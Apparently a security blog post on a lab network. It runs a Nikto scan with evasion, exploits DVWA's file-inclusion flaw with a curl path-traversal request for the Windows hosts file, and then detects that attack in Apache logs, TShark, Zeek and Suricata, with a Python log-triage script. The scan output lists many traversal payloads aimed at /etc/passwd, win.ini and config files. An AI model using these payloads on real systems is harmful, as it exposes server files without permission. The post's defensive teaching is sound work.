ALERT IN TX [00]:    49
PAYLOAD LEN:         211
PAYLOAD:
 0000  47 45 54 20 2F 63 67 69  2D 62 69 6E 2F 63 6D 64   GET /cgi -bin/cmd
 0010  2E 65 78 65 3F 2F 63 2B  64 69 72 20 48 54 54 50   .exe?/c+ dir HTTP
 0020  2F 31 2E 31 0D 0A 48 6F  73 74 3A 20 31 30 2E 30   /1.1..Ho st: 10.0
 0030  2E 30 2E 31 30 36 0D 0A  43 6F 6E 6E 65 63 74 69   .0.106.. Connecti
 0040  6F 6E 3A 20 4B 65 65 70  2D 41 6C 69 76 65 0D 0A   on: Keep -Alive..
 0050  55 73 65 72 2D 41 67 65  6E 74 3A 20 4D 6F 7A 69   User-Age nt: Mozi
 0060  6C 6C 61 2F 35 2E 30 20  28 57 69 6E 64 6F 77 73   lla/5.0  (Windows
 0070  20 4E 54 20 31 30 2E 30  3B 20 57 69 6E 36 34 3B    NT 10.0 ; Win64;
 0080  20 78 36 34 29 20 41 70  70 6C 65 57 65 62 4B 69    x64) Ap pleWebKi
 0090  74 2F 35 33 37 2E 33 36  20 28 4B 48 54 4D 4C 2C   t/537.36  (KHTML,
 00A0  20 6C 69 6B 65 20 47 65  63 6B 6F 29 20 43 68 72    like Ge cko) Chr
 00B0  6F 6D 65 2F 37 34 2E 30  2E 33 37 32 39 2E 31 36   ome/74.0 .3729.16
 00C0  39 20 53 61 66 61 72 69  2F 35 33 37 2E 33 36 0D   9 Safari /537.36.
 00D0  0A 0D 0A    

Nothing meaningful left here to review.

Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string

This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the hack and its detection.

From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.

The Hack - Remote File Retrieval with evasion type 4 -> Prepend long random string

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 5 -evasion 4
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.0.0.106
+ Target Hostname:    10.0.0.106
+ Target Port:        80
+ Using Encoding:     Prepend long random string
+ Start Time:         2023-06-06 15:13:18 (GMT-4)
---------------------------------------------------------------------------
...
+ /index.php?download=/winnt/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?download=/windows/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?download=/etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.
+ /index.php?|=../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
...
+ 925 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2023-06-06 15:13:20 (GMT-4) (2 seconds)
---------------------------------------------------------------------------

Everything above shows a 302. Hence I'm concluding this test was not successful.

Besides, we already learned previously that index.php does not have a parameter named "page", and there is none named "download". More importantly, /etc/passwd is found on Linux, not Windows, so those results are not valid for this purpose.

Leveraging my knowledge of the DVWA app to actually exploit this. Rather than using the web application directly, I will leverage curl to attempt to read the "c:\windows\system32\drivers\etc\hosts" file.

If we inspect the page, we see a "page" parameter. By default, its value is "include.php".

http://10.0.0.106/dvwa/vulnerabilities/fi/?page=include.php

Using curl:

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ curl --request GET --location "http://10.0.0.106/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts"
# Copyright (c) 1993-2009 Microsoft Corp.
# ...
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
10.0.0.107 mycooldomain.cdw
<!DOCTYPE html>

<html lang="en-GB">

        <head>
                <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

                <title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)</title>
...

We can see above, just before the original page loads, the text from the hosts file.

Transitioning to log analysis.

Detect - Log Analysis

Looking at the first entry in the access.log, we see a large set of random characters prepended to the request path.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | head -1
10.0.0.107 - - [06/Jun/2023:15:12:49 -0400] "GET /P4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmv/../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Looking for something meaningful: entries where the response code is 200.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\s+200\s+"
10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHy...JUNK...EkwGH/../favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "TRACE /eaXa8sc4...JUNK...Wlt5N/../ HTTP/1.0" 200 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"

Nothing meaningful above. What else is there?

Looking at the paths. How many were there?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | \
sort --unique | awk --field-separator="HTTP" '{ print $1 }' | wc --lines
667

Getting a snapshot of some of these.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | sort --unique | \
awk --field-separator="HTTP" '{ print $1 }'  
./0.alz 
../0.cer 
../0.egg
...
../autohtml.php?op=modload&mainfile=x&name=/etc/passwd 
../backup.alz 
...
./cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 
../cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 
../cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 
../cgi-bin/guestbook.cgi 
../cgi-bin/helpdesk.cgi 
../cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 
../cgi-bin/htgrep?file=index.html&hdr=/etc/passwd 
../cgi-bin/htmlscript?../../../../../../../../../../etc/passwd 
../cgi-bin/htsearch?exclude=%60/etc/passwd%60 
...
../cgi-bin/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ 
../cgi-bin/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\
...
./magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility 
../magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml 
../magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd 
../magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility 
...

Moving on to what an actual attack looks like. As we already know from above, there were only 2 entries that returned response code 200.

What does the log look like for an actual successful attack?

10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"

At this point, we need to review the system to see if that file exists. If it does, then you have to wonder what information was exposed. Do note that all systems tend to have a hosts file, and Windows definitely has its hosts file in that location. Maybe the packet analysis will help add more clarity.
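As an added example (my own code, not from the post), here is a small Python triage script for the two things this section turned on: the long random prefix that evasion type 4 prepends, which posixpath.normpath collapses the same way Apache does before mapping the path to a file, and the fact that only a 200 with a response body is worth chasing. It parses combined-format lines, flags parameter values that contain a traversal sequence, a null byte, or one of the file names the probes above reach for, and sorts the 200s that shipped bytes to the top. The log lines are constructed to mirror the post's entries with the random prefix shortened; the SENSITIVE list is an assumption to be extended per environment.

```python
import posixpath
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

# Constructed lines mirroring the post's access.log entries; the random prefix
# from evasion type 4 is shortened and the user agents are trimmed.
SAMPLE_LOG = '''\
10.0.0.107 - - [06/Jun/2023:15:12:49 -0400] "GET /P4JTD9bmSV1pmvP4JTD9bmSV1pmv/../ HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHyJUNKEkwGH/../favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0"
10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHyJUNKEkwGH/../index.php?download=/etc/passwd HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHyJUNKEkwGH/../cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"
'''

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "[^"]*" "(?P<ua>[^"]*)"'
)

# File names the probes in this post reach for. Assumption: extend for your hosts.
SENSITIVE = ("/etc/passwd", "win.ini", "system32/drivers/etc/hosts")
TRAVERSAL = re.compile(r"\.\.[/\\]")


@dataclass
class Finding:
    src: str
    ua: str
    path: str
    query: str
    status: int
    size: int
    reasons: list = field(default_factory=list)


def normalize(uri: str) -> tuple[str, str]:
    """Split the URI and collapse dot segments in the path the way Apache does
    before mapping it to a file: '/RANDOM/../favicon.ico' becomes '/favicon.ico',
    so the evasion prefix no longer hides the real target. The query is only
    percent-decoded; its own '../' sequences are what we want to see."""
    path, _, query = uri.partition("?")
    return posixpath.normpath(unquote(path)), unquote(query)


def analyze(log_text: str) -> list[Finding]:
    """Flag requests whose parameter values look like file retrieval attempts and
    order them so that responses that actually returned a body come first."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        path, query = normalize(m.group("uri"))
        reasons = []
        if TRAVERSAL.search(query):
            reasons.append("traversal in parameter value")
        if any(name in query for name in SENSITIVE):
            reasons.append("sensitive file name in parameter value")
        if "\x00" in query:
            reasons.append("null byte in query")
        if not reasons:
            continue
        size = 0 if m.group("bytes") == "-" else int(m.group("bytes"))
        findings.append(Finding(m.group("src"), m.group("ua"), path, query,
                                int(m.group("status")), size, reasons))
    # A 302 with no body is a miss; a 200 that shipped bytes is what to chase.
    findings.sort(key=lambda f: (f.status != 200, -f.size))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f.status, f.size, f.ua, f.path, f.query[:60], "|", ", ".join(f.reasons))
```

Run against these lines, the curl request for the hosts file comes out on top (200, 4005 bytes, user agent curl/7.88.1), exactly the entry the paragraph above says needs the follow-up on the server, while the 302 probes sit underneath it as noise.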


Detect - Packet Analysis

Setting up for packet analysis: capture packets on ports 80 and 443.

Get the streams where the response code was 200


┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r tuning_5.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -e tcp.len -E header=y
ip.src  ip.dst  tcp.srcport     tcp.stream      tcp.len
10.0.0.106      10.0.0.107      80      4       549
10.0.0.106      10.0.0.107      80      8       187
10.0.0.106      10.0.0.107      80      9       0

Looking at stream 4, we see it is the favicon.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r tuning_5.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200\s+" --before-context=7  --after-context=10
GET /0RHy...JUNK...kwGH/../favicon.ico HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 10.0.0.106
Connection: Keep-Alive


        1460
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2023 19:12:50 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive
Content-Type: image/x-icon

Detecting the actual attack via packet analysis

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap 
    1 0.000000000   10.0.0.107 → 10.0.0.106   TCP 74 59456 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1949226976 TSecr=0 WS=128
    2 0.000252977   10.0.0.106 → 10.0.0.107   TCP 66 80 → 59456 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM
    3 0.000288567   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0
    4 0.000369486   10.0.0.107 → 10.0.0.106   HTTP 210 GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1 
    5 0.009548711   10.0.0.106 → 10.0.0.107   TCP 1514 HTTP/1.1 200 OK  [TCP segment of a reassembled PDU]
    6 0.009548962   10.0.0.106 → 10.0.0.107   TCP 1514 80 → 59456 [ACK] Seq=1461 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]
    7 0.009548998   10.0.0.106 → 10.0.0.107   TCP 1514 80 → 59456 [ACK] Seq=2921 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]
    8 0.009549028   10.0.0.106 → 10.0.0.107   HTTP 125 HTTP/1.1 200 OK  (text/html)
    9 0.009599451   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=1461 Win=64128 Len=0
   10 0.009615795   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=2921 Win=63488 Len=0
   11 0.009623869   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=4381 Win=62592 Len=0
   12 0.009635647   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=157 Ack=4452 Win=62592 Len=0
   13 0.011856522   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [FIN, ACK] Seq=157 Ack=4452 Win=64128 Len=0
   14 0.012227611   10.0.0.106 → 10.0.0.107   TCP 60 80 → 59456 [ACK] Seq=4452 Ack=158 Win=2102272 Len=0
   15 0.012227889   10.0.0.106 → 10.0.0.107   TCP 60 80 → 59456 [FIN, ACK] Seq=4452 Ack=158 Win=2102272 Len=0
   16 0.012271428   10.0.0.107 → 10.0.0.106   TCP 54 59456 → 80 [ACK] Seq=158 Ack=4453 Win=64128 Len=0

How many conversations were part of this communication?

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap -q -z conv,tcp
================================================================================
TCP Conversations
Filter:<No Filter>
                                                           |       <-      | |       ->      | |     Total     |    Relative    |   Duration   |
                                                           | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |              |
10.0.0.107:59456           <-> 10.0.0.106:80                    7 4,853 bytes       9 662 bytes      16 5,515 bytes     0.000000000         0.0123
================================================================================

Following stream 0.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ tshark -n -r fi.pcap -q -z follow,tcp,ascii,0

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.107:59456
Node 1: 10.0.0.106:80
156
GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
Host: 10.0.0.106
User-Agent: curl/7.88.1
Accept: */*


        1460
HTTP/1.1 200 OK
Date: Wed, 07 Jun 2023 18:36:24 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=vba6pa2had7c86op2lnluit7v5; expires=Thu, 08-Jun-2023 18:36:24 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4005
Content-Type: text/html;charset=utf-8

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#.127.0.0.1       localhost
#.::1             localhost
10.0.0.107 mycooldomain.cdw
<!DOCTYPE html>

The packet analysis confirms our log analysis findings. The file was successfully retrieved, hence we see its full contents above. As we say in SANS SEC503 (Network Monitoring and Threat Detection): packets or it did not happen. This is clear evidence of this.

Transitioning to Zeek

Detect - Zeek Analysis

Setup Zeek.

┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]
└─$ sudo zeek --iface any --no-checksums

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat http.log | grep --perl-regexp "\s+200\s+" | head --lines=1
1686078799.407770       C0NrKC2wb8TbvK0iZb      10.0.0.107      39234   10.0.0.106      80      53      GET     10.0.0.106      /0RHy...JUNK...wGH/../favicon.ico      -       1.1     Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36    -       0       30894   200     OK      -       -       (empty) -       -       -       -       -       -       F0bkFD4SgqIlRoiaQf     -       image/x-icon

Looking at the actual attack traffic, we see something similar to what we saw in our log analysis of the access.log file.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat http.log  

1686163005.810950       C7ccD83WRZobza0Lj9      10.0.0.107      59456   10.0.0.106      80      1       GET     10.0.0.106      /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts     -       1.1   curl/7.88.1      -       0       4005    200     OK 

Detect - Suricata (IDS) Analysis

Set up Suricata to operate in IDS mode.

┌──(kali㉿securitynik)-[/var/log/suricata]
└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all


What did the IDS produce? Looking at the first 5 entries.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5
    120 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt 
     16 1:2018056:4] ET WEB_SERVER Possible XXE SYSTEM ENTITY in POST BODY. 
      6 1:2021951:3] ET EXPLOIT Possible Magento Directory Traversal Attempt 
      4 1:2101402:9] GPL EXPLOIT iissamples access 
      4 1:2101245:13] GPL EXPLOIT ISAPI .idq access 

Nothing above that I would like to dig deeper into.

Looking at the actual attack from the IDS perspective.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat fast.log 
06/07/2023-14:36:45.810950  [**] [1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 10.0.0.107:59456 -> 10.0.0.106:80

Looking at the packet.

┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]
└─$ cat alert-debug.log 
+================
TIME:              06/07/2023-14:36:45.810950
PKT SRC:           wire/pcap
SRC IP:            10.0.0.107
DST IP:            10.0.0.106
PROTO:             6
SRC PORT:          59456
DST PORT:          80
TCP SEQ:           2738297529
TCP ACK:           2364260716
FLOW:              to_server: TRUE, to_client: FALSE
FLOW Start TS:     06/07/2023-14:36:45.810580
FLOW PKTS TODST:   3
FLOW PKTS TOSRC:   1
FLOW Total Bytes:  404
FLOW IPONLY SET:   TOSERVER: TRUE, TOCLIENT: TRUE
FLOW ACTION:       DROP: FALSE
FLOW NOINSPECTION: PACKET: FALSE, PAYLOAD: FALSE, APP_LAYER: FALSE
FLOW APP_LAYER:    DETECTED: TRUE, PROTO 1
PACKET LEN:        210
PACKET:
 0000  08 00 27 88 B8 34 08 00  27 DB 96 6A 08 00 45 00   ..'..4.. '..j..E.
 0010  00 C4 75 E1 40 00 40 06  AF 7E 0A 00 00 6B 0A 00   ..u.@.@. .~...k..
 0020  00 6A E8 40 00 50 A3 37  1A B9 8C EB C1 6C 50 18   .j.@.P.7 .....lP.
 0030  01 F6 15 8B 00 00 47 45  54 20 2F 64 76 77 61 2F   ......GE T /dvwa/
 0040  76 75 6C 6E 65 72 61 62  69 6C 69 74 69 65 73 2F   vulnerab ilities/
 0050  66 69 2F 3F 70 61 67 65  3D 2E 2E 2F 2E 2E 2F 2E   fi/?page =../../.
 0060  2E 2F 2E 2E 2F 2E 2E 2F  2E 2E 2F 77 69 6E 64 6F   ./../../ ../windo
 0070  77 73 2F 73 79 73 74 65  6D 33 32 2F 64 72 69 76   ws/syste m32/driv
 0080  65 72 73 2F 65 74 63 2F  68 6F 73 74 73 20 48 54   ers/etc/ hosts HT
 0090  54 50 2F 31 2E 31 0D 0A  48 6F 73 74 3A 20 31 30   TP/1.1.. Host: 10
 00A0  2E 30 2E 30 2E 31 30 36  0D 0A 55 73 65 72 2D 41   .0.0.106 ..User-A
 00B0  67 65 6E 74 3A 20 63 75  72 6C 2F 37 2E 38 38 2E   gent: cu rl/7.88.
 00C0  31 0D 0A 41 63 63 65 70  74 3A 20 2A 2F 2A 0D 0A   1..Accep t: */*..
 00D0  0D 0A                                              ..
...

Nothing else to look at here.

Hope you enjoyed the posts in this series: